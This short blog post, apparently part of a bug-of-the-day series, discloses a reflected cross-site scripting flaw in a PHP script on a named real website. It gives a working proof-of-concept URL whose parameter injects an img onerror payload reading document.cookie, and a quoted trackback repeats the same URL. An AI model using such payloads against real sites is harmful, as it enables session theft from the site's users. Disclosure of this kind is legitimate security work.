For our first bug of the day, we need look no further than the first PHP script in the web root.
In fact, we don’t need to read more than 3 lines of code to find it. Unescaped user inputs are being echoed out to the page. This means XSS. This means pwnage.
http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E
-mckt
[…] GBOTD#1 is a XSS found in the first 3 lines of the first file: http://gawker.com/at.js.php?country=%3Cimg%20src%3D.%20onerror%3Dalert%28document.cookie%29%20%3E […]